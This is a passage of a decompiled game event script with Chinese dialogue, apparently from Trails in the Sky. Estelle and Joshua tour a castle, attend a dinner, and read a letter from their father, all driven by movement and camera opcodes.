OP_8E(0xFE, 0xFFFECB86, 0x0, 0x1CDE, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xC, 1, lambda_195E)
WaitChrThread(0x102, 0x1)
def lambda_197E():
OP_8E(0xFE, 0xFFFEC7F8, 0x0, 0x159A, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0x102, 1, lambda_197E)
WaitChrThread(0x101, 0x1)
def lambda_199E():
OP_8E(0xFE, 0xFFFECD2A, 0x0, 0x1554, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0x101, 1, lambda_199E)
WaitChrThread(0x108, 0x1)
def lambda_19BE():
OP_8E(0xFE, 0xFFFECA50, 0x0, 0x1162, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0x108, 1, lambda_19BE)
WaitChrThread(0xC, 0x1)
Sleep(200)
OP_8E(0xC, 0xFFFEC668, 0x0, 0x1C52, 0x7D0, 0x0)
TurnDirection(0xC, 0x102, 0)
ChrTalk(
0xC,
(
"这个就是各位\x01",
"晚上可以使用的房间。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
"请进吧。\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F嗯、嗯……\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F那么我们就告辞了。\x02",
)
CloseMessageWindow()
OP_43(0x101, 0x1, 0x0, 0xA)
Sleep(500)
OP_43(0x102, 0x1, 0x0, 0xA)
Sleep(500)
OP_43(0x108, 0x1, 0x0, 0xA)
Sleep(1000)
OP_44(0x101, 0xFF)
OP_44(0x102, 0xFF)
OP_44(0x108, 0xFF)
ClearMapFlags(0x1)
Fade(1000)
OP_6D(-79120, 0, 55910, 0)
OP_67(0, 8000, -10000, 0)
OP_6B(2800, 0)
OP_6C(45000, 0)
OP_6E(262, 0)
OP_9F(0x101, 0xFF, 0xFF, 0xFF, 0xFF, 0x0)
OP_9F(0x102, 0xFF, 0xFF, 0xFF, 0xFF, 0x0)
OP_9F(0x108, 0xFF, 0xFF, 0xFF, 0xFF, 0x0)
SetChrPos(0xC, -80040, 0, 50510, 0)
SetChrPos(0x101, -80880, 0, 53000, 315)
SetChrPos(0x102, -79650, 0, 53710, 270)
SetChrPos(0x108, -78830, 0, 52390, 0)
Sleep(1000)
ChrTalk(
0x101,
"#000F哇……\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F能在这种地方过夜,\x01",
"真是无法想象呢……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F哎呀~真是不错啊,\x01",
"可以当成炫耀的资本了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"在晚宴开始之前,\x01",
"请在此等候。\x02",
)
)
CloseMessageWindow()
def lambda_1C1C():
TurnDirection(0xFE, 0xC, 400)
ExitThread()
QueueWorkItem(0x101, 1, lambda_1C1C)
def lambda_1C2A():
TurnDirection(0xFE, 0xC, 400)
ExitThread()
QueueWorkItem(0x102, 1, lambda_1C2A)
def lambda_1C38():
TurnDirection(0xFE, 0xC, 400)
ExitThread()
QueueWorkItem(0x108, 1, lambda_1C38)
OP_6D(-79790, 0, 52600, 1000)
ChrTalk(
0xC,
(
"虽然城内允许自由参观,\x01",
"不过因为警卫上的理由,\x01",
"有一些禁止进入的区域。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
"请不要到那些地方去。\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F嗯,具体来说\x01",
"哪些地方不能去呢?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"首先是,\x01",
"女王陛下居住的女王宫。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"就是在屋顶空中庭园的一角\x01",
"建造的小型宫殿。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F空中庭园……\x01",
"听起来感觉十分地美丽呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"嘻嘻……生日庆典的时候,\x01",
"陛下会在那里的阳台上\x01",
"向王都的市民致意。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"如果只是到空中庭园去的话,\x01",
"也应该足够了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
"还有,其他禁止进入的场所……\x02",
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"在1楼的亲卫队办公室\x01",
"以及地下的宝物库。\x02",
)
)
CloseMessageWindow()
OP_9F(0x108, 0xFF, 0xFF, 0xFF, 0xFF, 0x0)
ChrTalk(
0x102,
"#010F亲卫队办公室……\x02",
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F是不是作为恐怖分子\x01",
"受到通缉的那些人呢?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
"是、是的……\x02",
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"现在,那个办公室\x01",
"正由情报部的人使用。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"所以不允许进入,\x01",
"请你们理解。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F差不多明白了。\x02\x03",
"对了,晚宴邀请的其他客人\x01",
"现在在哪里呢?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"过一会儿,\x01",
"你们就能见到了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"大概他们现在\x01",
"正在各自的房间里休息吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F是吗……\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F那么,\x01",
"克劳斯市长已经来了吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"是的,\x01",
"刚刚才招待过他。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
"那么,我先告退了……\x02",
)
CloseMessageWindow()
ChrTalk(
0xC,
(
"如果有什么事情的话,\x01",
"请到1楼的休息室来找我。\x02",
)
)
CloseMessageWindow()
OP_8C(0xC, 180, 400)
def lambda_21AF():
OP_9F(0xFE, 0xFF, 0xFF, 0xFF, 0x0, 0x3E8)
ExitThread()
QueueWorkItem(0xC, 1, lambda_21AF)
OP_8E(0xC, 0xFFFEC6F4, 0x0, 0xBC3E, 0x3E8, 0x0)
SetChrFlags(0xC, 0x4)
ChrTalk(
0x101,
"#000F嗯……\x02",
)
CloseMessageWindow()
TurnDirection(0x101, 0x102, 400)
TurnDirection(0x102, 0x101, 400)
FadeToDark(300, 0, 100)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"艾丝蒂尔和约修亚\x01",
"趁金没有注意交换了眼色。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
def lambda_225A():
TurnDirection(0xFE, 0x108, 400)
ExitThread()
QueueWorkItem(0x102, 1, lambda_225A)
TurnDirection(0x101, 0x108, 400)
ChrTalk(
0x101,
(
"#000F……我说,金先生。\x02\x03",
"我们想借此机会\x01",
"在城里参观一下……\x02",
)
)
CloseMessageWindow()
def lambda_22C5():
TurnDirection(0xFE, 0x101, 400)
ExitThread()
QueueWorkItem(0x108, 1, lambda_22C5)
ChrTalk(
0x102,
"#010F晚宴开始之前就会回来。\x02",
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F哎呀哎呀,刚刚比赛完,\x01",
"年轻人真是精力旺盛啊。\x02\x03",
"好,你们去吧。\x02\x03",
"吃饭之前\x01",
"我就在这豪华的房间里休息一下吧。\x02",
)
)
CloseMessageWindow()
Fade(1000)
OP_6D(-79060, 0, 5580, 0)
RemoveParty(0x7, 0xFF)
SetChrPos(0x101, -79060, 0, 9840, 0)
SetChrPos(0x102, -79060, 0, 9840, 0)
def lambda_23EC():
OP_8E(0xFE, 0xFFFECE2E, 0x0, 0x15B8, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x101, 1, lambda_23EC)
Sleep(600)
def lambda_240C():
OP_8E(0xFE, 0xFFFECA5A, 0x0, 0x190A, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x102, 1, lambda_240C)
WaitChrThread(0x101, 0x1)
def lambda_242C():
TurnDirection(0xFE, 0x102, 400)
ExitThread()
QueueWorkItem(0x101, 1, lambda_242C)
WaitChrThread(0x102, 0x1)
def lambda_243F():
TurnDirection(0xFE, 0x101, 400)
ExitThread()
QueueWorkItem(0x102, 1, lambda_243F)
ChrTalk(
0x101,
(
"#000F在晚宴开始之前,\x01",
"一定要尽可能多做一些事情。\x02\x03",
"首先要去找\x01",
"尤莉亚小姐所说的希尔丹夫人。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F还有,我们最好\x01",
"去和其他的客人打个招呼。\x02\x03",
"大概,认识的人会很多吧。\x02",
)
)
CloseMessageWindow()
OP_6A(0x0)
ClearMapFlags(0x1)
EventEnd(0x0)
Return()
# Function_9_187E end
def Function_10_2539(): pass

label("Function_10_2539")

# Walk-off routine for the calling character (0xFE): move to a waypoint,
# queue an OP_9F on thread 3 (presumably a fade/tint to alpha 0 over
# 1000 ms — TODO confirm opcode semantics), then keep walking while it runs.
OP_8E(0xFE, 0xFFFECB5E, 0x0, 0x1CA2, 0xBB8, 0x0)

def lambda_2553():
    OP_9F(0xFE, 0xFF, 0xFF, 0xFF, 0x0, 0x3E8)
    ExitThread()

QueueWorkItem(0xFE, 3, lambda_2553)

OP_8E(0xFE, 0xFFFECB68, 0x0, 0x2602, 0xBB8, 0x0)
Return()

# Function_10_2539 end
def Function_11_2574(): pass
label("Function_11_2574")
EventBegin(0x0)
OP_6D(-80130, 0, 51090, 0)
OP_67(0, 8000, -10000, 0)
OP_6B(2800, 0)
OP_6C(45000, 0)
OP_6E(262, 0)
AddParty(0x7, 0xFF)
SetChrPos(0x101, -80670, 0, 51310, 270)
SetChrPos(0x102, -79770, 0, 50560, 270)
SetChrPos(0x108, -87580, 0, 52200, 90)
OP_6D(-83020, 0, 52310, 2000)
ChrTalk(
0x108,
(
"#070F哟,艾丝蒂尔、约修亚。\x01",
"回来的是不是有些晚呢。\x02\x03",
"就要到晚宴开始的时候了吧?\x02",
)
)
CloseMessageWindow()
def lambda_2653():
OP_8E(0xFE, 0xFFFEBD4E, 0x0, 0xCDA0, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x101, 1, lambda_2653)
Sleep(300)
def lambda_2673():
OP_6D(-86640, 0, 52720, 3000)
ExitThread()
QueueWorkItem(0x101, 3, lambda_2673)
def lambda_268B():
OP_8E(0xFE, 0xFFFEBD4E, 0x0, 0xCDA0, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x102, 1, lambda_268B)
WaitChrThread(0x101, 0x1)
def lambda_26AB():
OP_8E(0xFE, 0xFFFEB042, 0x0, 0xD0D4, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x101, 1, lambda_26AB)
WaitChrThread(0x102, 0x1)
def lambda_26CB():
OP_8E(0xFE, 0xFFFEAFF2, 0x0, 0xCB48, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x102, 1, lambda_26CB)
WaitChrThread(0x101, 0x1)
TurnDirection(0x101, 0x108, 400)
WaitChrThread(0x101, 0x3)
ChrTalk(
0x101,
(
"#000F抱歉啊,金大哥。\x02\x03",
"东看看西逛逛的\x01",
"就把时间给忘了~\x02\x03",
"而且还和各地的市长们\x01",
"谈了许多哦。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F咦,你们俩之前就\x01",
"认识那些有身份的人物吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F洛连特的市长\x01",
"平日里就对我们很亲切。\x02\x03",
"其他的几位是我们在旅行\x01",
"途中经过各个城市时认识的。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F原来如此啊。\x02\x03",
"游击士在完成任务的时候,\x01",
"的确有许多结识有身份人物的机会呢。\x02\x03",
"可是这样看来,\x01",
"你们好像极为活跃对吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F哈哈哈……还没有到那种程度啦。\x02\x03",
"金大哥到王都来是因为\x01",
"有什么任务要完成吗?\x02\x03",
"我想,虽说是在别国,\x01",
"但还是照样可以完成相关任务吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F是啊,一旦成为了正游击士,\x01",
"就可以去做一些超越国界的任务了……\x02\x03",
"预选赛啊,大使馆的手续啊什么的,\x01",
"弄得我连接受任务的时间都没有了。\x02\x03",
"唉,如果另外再来四位游击士的话,\x01",
"就可以不用我来参加比赛了啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F的确,如果游击士们都聚集到了这里,\x01",
"大部分事件都可以很快解决的。\x02\x03",
"可若是都在王都集中了的话,\x01",
"其他地方的支部可就难办了……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
"#070F哇哈哈,说的也是啊。\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F呼,总觉得到现在才\x01",
"想到这些也用处不大了。\x02\x03",
"雪拉姐现在在洛连特\x01",
"做什么呢……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F雪拉姐……\x01",
"是指雪拉扎德吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F咦……你认识她!?\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F是呀,她是我们的前辈,\x01",
"过去一直都在照顾着我们。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F原来如此,竟然是这样。\x02\x03",
"以前她到卡尔瓦德来的时候\x01",
"和我认识的。\x02\x03",
"她有一个很好的老师啊,\x01",
"年纪轻轻却是见多识广。\x02",
)
)
CloseMessageWindow()
def lambda_2D1A():
TurnDirection(0xFE, 0x102, 400)
ExitThread()
QueueWorkItem(0x101, 1, lambda_2D1A)
def lambda_2D28():
TurnDirection(0xFE, 0x101, 400)
ExitThread()
QueueWorkItem(0x102, 1, lambda_2D28)
Sleep(1000)
ChrTalk(
0x101,
"#000F(他说的那个老师不就是……)\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F(嗯,就是父亲呢。)\x02",
)
CloseMessageWindow()
OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x102, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x108, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Sleep(1000)
SetChrPos(0xC, -80120, 0, 48440, 315)
def lambda_2DD1():
TurnDirection(0xFE, 0xC, 400)
ExitThread()
QueueWorkItem(0x101, 1, lambda_2DD1)
def lambda_2DDF():
TurnDirection(0xFE, 0xC, 400)
ExitThread()
QueueWorkItem(0x108, 1, lambda_2DDF)
def lambda_2DED():
TurnDirection(0xFE, 0xC, 400)
ExitThread()
QueueWorkItem(0x102, 1, lambda_2DED)
ChrTalk(
0xC,
(
"打搅一下,\x01",
"晚宴已经准备完毕了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xC,
"让我带你们大家去可以吗?\x02",
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F哦啊,我等的都有些腻烦了呢。\x02\x03",
"那~么,我们这就去\x01",
"好好享用这顿美餐吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F嗯,说起来在比赛之后\x01",
"我的肚子已经饿的不行了。\x02\x03",
"走吧~大吃一顿去了~⊙\x02",
)
)
CloseMessageWindow()
OP_62(0x102, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1)
OP_22(0x31, 0x0, 0x64)
OP_8C(0x102, 315, 400)
Sleep(1000)
ChrTalk(
0x102,
(
"#010F我说你们俩啊……\x02\x03",
"还是不要忘记了\x01",
"餐桌上的那些礼仪了哦……\x02",
)
)
CloseMessageWindow()
OP_A2(0x3FA)
NewScene("ED6_DT01/T4251 ._SN", 100, 0, 0)
IdleLoop()
Return()
# Function_11_2574 end
def Function_12_2FB0(): pass
label("Function_12_2FB0")
EventBegin(0x0)
OP_6D(-79320, 0, 55910, 0)
RemoveParty(0x7, 0xFF)
ClearChrFlags(0xD, 0x80)
SetChrPos(0xD, -79660, 0, 56600, 192)
SetChrPos(0x101, -80390, 0, 55080, 23)
SetChrPos(0x102, -78690, 0, 55240, 315)
ChrTalk(
0xD,
(
"#070F哎呀,出乎预料的事\x01",
"竟然意外的听说了。\x02\x03",
"我一来就插入你们国家的谈话,\x01",
"把你们两个很是\x01",
"吓了一跳对吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F那、那是当然的了!\x02\x03",
"要、要不是说的\x01",
"还比较周到的话……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xD,
"#070F啊?\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F啊,嗯,没什么。\x02\x03",
"其实……\x01",
"真是遗憾啊。\x02\x03",
"虽然特地让舌头沉醉于\x01",
"美味的料理之中,\x01",
"可最后那道菜的精妙还是没能体会。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F哈哈,不用强求嘛。\x02\x03",
"对了,艾丝蒂尔,\x01",
"去散散步消化一下食物如何?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F咦……?\x02\x03",
"啊啊!\x01",
"对呀,好建议!\x02\x03",
"不错呢~我也想好好\x01",
"呼吸一下外面的新鲜空气了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xD,
(
"#070F啊~刚才去参观各处,\x01",
"这回吃完饭又要去散步了……\x02\x03",
"想不承认都不行啊,\x01",
"这就是年纪的差异导致的呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F啊哈哈,金大哥你太夸张了。\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F金兄也去\x01",
"走走如何?\x02\x03",
"这个历史久远的建筑\x01",
"可供参观的地方不少呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xD,
(
"#070F嗯,等我想到了的时候\x01",
"再到处溜达一下也不迟。\x02\x03",
"我要去厨房看看,\x01",
"应该还有一些剩余的食物。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F不会吧……\x01",
"还要打算吃吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xD,
(
"#070F也算是吧,\x01",
"就是想弄点酒菜。\x02\x03",
"想喝酒可以到谈话室去,\x01",
"待会儿我就去瞧瞧。\x02",
)
)
CloseMessageWindow()
OP_28(0x4A, 0x4, 0x2)
OP_28(0x4A, 0x4, 0x4)
OP_28(0x4A, 0x1, 0x1)
OP_28(0x4A, 0x1, 0x2)
OP_28(0x4A, 0x1, 0x4)
EventEnd(0x0)
Return()
# Function_12_2FB0 end
def Function_13_358A(): pass

label("Function_13_358A")

# Short scripted event: Estelle (0x101) and Joshua (0x102) walk in, turn to
# face each other, and exchange a few lines about seeing the Queen.
# Dialogue text is game data — kept verbatim.
EventBegin(0x0)
OP_6D(-79060, 0, 5580, 0)
SetChrPos(0x101, -79060, 0, 9840, 0)
SetChrPos(0x102, -79060, 0, 9840, 0)

# Staggered walk-in: each lambda runs on the character's work thread 1.
def lambda_35C5():
    OP_8E(0xFE, 0xFFFECE2E, 0x0, 0x15B8, 0xBB8, 0x0)
    ExitThread()

QueueWorkItem(0x101, 1, lambda_35C5)
Sleep(600)

def lambda_35E5():
    OP_8E(0xFE, 0xFFFECA5A, 0x0, 0x190A, 0xBB8, 0x0)
    ExitThread()

QueueWorkItem(0x102, 1, lambda_35E5)
WaitChrThread(0x101, 0x1)

def lambda_3605():
    TurnDirection(0xFE, 0x102, 400)
    ExitThread()

QueueWorkItem(0x101, 1, lambda_3605)
WaitChrThread(0x102, 0x1)

def lambda_3618():
    TurnDirection(0xFE, 0x101, 400)
    ExitThread()

QueueWorkItem(0x102, 1, lambda_3618)

ChrTalk(
    0x101,
    (
        "#000F呼~……\x01",
        "真是出乎预料的事啊。\x02\x03",

        "越来越想去见女王陛下,\x01",
        "并问问到底怎么回事了。\x02",
    )
)

CloseMessageWindow()

ChrTalk(
    0x102,
    (
        "#010F首先按照约定\x01",
        "去见希尔丹夫人吧。\x02\x03",

        "她应该有办法\x01",
        "让我们见到陛下的。\x02",
    )
)

CloseMessageWindow()

ChrTalk(
    0x101,
    "#000F嗯,明白。\x02",
)

CloseMessageWindow()
EventEnd(0x0)
Return()

# Function_13_358A end
def Function_14_3737(): pass
label("Function_14_3737")
EventBegin(0x0)
OP_6D(-79860, 0, 50720, 0)
SetChrPos(0x101, -80040, 0, 48610, 0)
SetChrPos(0x102, -80040, 0, 48610, 0)
SetChrPos(0x108, -80040, 0, 48610, 0)
OP_9F(0x101, 0xFF, 0xFF, 0xFF, 0x0, 0x0)
OP_9F(0x102, 0xFF, 0xFF, 0xFF, 0x0, 0x0)
OP_9F(0x108, 0xFF, 0xFF, 0xFF, 0x0, 0x0)
def lambda_37A4():
OP_6D(-79660, 0, 55360, 4000)
ExitThread()
QueueWorkItem(0x101, 3, lambda_37A4)
def lambda_37BC():
OP_9F(0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0x1F4)
ExitThread()
QueueWorkItem(0x108, 2, lambda_37BC)
def lambda_37CE():
OP_8E(0xFE, 0xFFFEC762, 0x0, 0xDA52, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0x108, 1, lambda_37CE)
Sleep(500)
def lambda_37EE():
OP_9F(0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0x1F4)
ExitThread()
QueueWorkItem(0x101, 2, lambda_37EE)
def lambda_3800():
OP_8E(0xFE, 0xFFFEC640, 0x0, 0xD426, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0x101, 1, lambda_3800)
Sleep(500)
def lambda_3820():
OP_9F(0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0x1F4)
ExitThread()
QueueWorkItem(0x102, 2, lambda_3820)
def lambda_3832():
OP_8E(0xFE, 0xFFFECAC8, 0x0, 0xD3CC, 0x7D0, 0x0)
ExitThread()
QueueWorkItem(0x102, 1, lambda_3832)
WaitChrThread(0x108, 0x1)
OP_8C(0x108, 180, 400)
ChrTalk(
0x108,
(
"#070F哎呀哎呀……\x02\x03",
"总算是用比较擅长的\x01",
"手法蒙混过去了。\x02",
)
)
CloseMessageWindow()
WaitChrThread(0x101, 0x1)
ChrTalk(
0x101,
(
"#000F哎……!\x02\x03",
"金大哥,\x01",
"你不是喝醉了吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F那个啊,只是演技而已。\x02\x03",
"我可是一滴酒都没喝。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F说谎!?\x01",
"明明脸那么红……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F驱动内力,让血气上游,\x01",
"让表面看起来一副喝醉的样子……\x02\x03",
"在东方武术里,\x01",
"这就是所谓『气功』的功夫对吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F哦,这种事情\x01",
"你都知道,让我吃惊不小呢。\x02\x03",
"哎呀,刚才看见你们陷入困境,\x01",
"我就忍不住叫了你们一声。\x02\x03",
"如何,还算帮了点忙吧?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F真是的,金大哥你呀,\x01",
"让人捉摸不透~\x02\x03",
"虽说是来帮忙的,\x01",
"但着实吓了人一跳。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F哈哈,抱歉抱歉。\x02\x03",
"那么,情况怎么样?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F???\x02\x03",
"什么怎么样呢?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F办完了吧。\x02\x03",
"和女王陛下见面的事情。\x02",
)
)
CloseMessageWindow()
OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x102, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Sleep(1000)
ChrTalk(
0x101,
(
"#000F什、什么~!?\x02\x03",
"为、为、为什么金大哥你知道!?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F难道说是在艾南先生\x01",
"那里听说了什么吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F协会那个兄弟\x01",
"并没有告诉我什么。\x02\x03",
"如果要说有什么的话,\x01",
"就是他曾经款待过我。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F款待……\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F……没有任何情报,\x01",
"是不可能做出这样的推断的。\x02\x03",
"金兄……\x01",
"你究竟知道些什么?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F嗯……\x02\x03",
"也该是时候把那个东西\x01",
"拿给你们看看了。\x02",
)
)
CloseMessageWindow()
OP_8E(0x108, 0xFFFEC6D6, 0x0, 0xD6B0, 0x7D0, 0x0)
FadeToDark(300, 0, 100)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"金从怀中取出一封信\x01",
"递给了艾丝蒂尔。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
OP_8F(0x108, 0xFFFEC762, 0x0, 0xDA52, 0x7D0, 0x0)
ChrTalk(
0x101,
"#000F信、信……?\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F这个笔迹是……\x02",
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F嗯,你们先拿来\x01",
"读一读吧。\x02\x03",
"然后就知道怎么回事了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F嗯、嗯……\x02",
)
CloseMessageWindow()
FadeToDark(300, 0, 100)
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"艾丝蒂尔\x01",
"开始阅读信的内容。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"金·瓦赛克阁下敬启。\x01",
"久疏问候,身体可好。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"由于事出匆忙,我只有采取\x01",
"开门见山的方式,万望见谅。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"事实上,连同猎兵团在内的事件\x01",
"已经朝向帝国方向发展了。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"可是,利贝尔国内似乎正有\x01",
"一股微妙的势力正在滋长蔓延着。\x01",
"若只是交给年轻人去处理,我有些放心不下。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"我想请您帮忙。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"在我外出的时候,您到利贝尔来,\x01",
"如果有什么情况发生的话,\x01",
"就帮帮那些年轻人们,可以吗?\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"因为您是第一次前往利贝尔,\x01",
"所以顺便游山玩水也是不错的选择。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"女王诞辰庆典前夕,会召开\x01",
"允许外国人参加的武术大会,\x01",
"这是一个很好的机会呢。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"突然提出这样的请求,或许让您有些为难,\x01",
"不过如果您有空的话,还请帮一帮忙。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"女王诞辰庆典时我会回来,\x01",
"到那时我再一并感谢。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
" 卡西乌斯·布莱特\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"另:\x01",
"您也许会有机会见到\x01",
"我的女儿和儿子。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"我让他们在游击士协会实习,\x01",
"当时没有想太多,只是锻炼一下他们。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0x5),
"如果他们有什么事,还请您\x01",
"助他们一臂之力,帮他们摆脱困境。\x02",
)
)
CloseMessageWindow()
OP_56(0x0)
FadeToBright(300, 0)
ChrTalk(
0x101,
"#000F……这、这是……\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F金兄是父亲委托\x01",
"来利贝尔的……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
"#070F嗯,就是这样的。\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F什么叫就是这样的……\x02\x03",
"关、关键的是金大哥\x01",
"你竟然和老爸串通一气!\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x108,
(
"#070F串通一气什么的不太好听啊。\x02\x03",
"以前卡西乌斯大人\x01",
"来到我们卡尔瓦德时,\x01",
"我也受到了他很多的关照。\x02\x03",
"我一直都想报答他,\x01",
"这封信正好了却了我的心愿。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
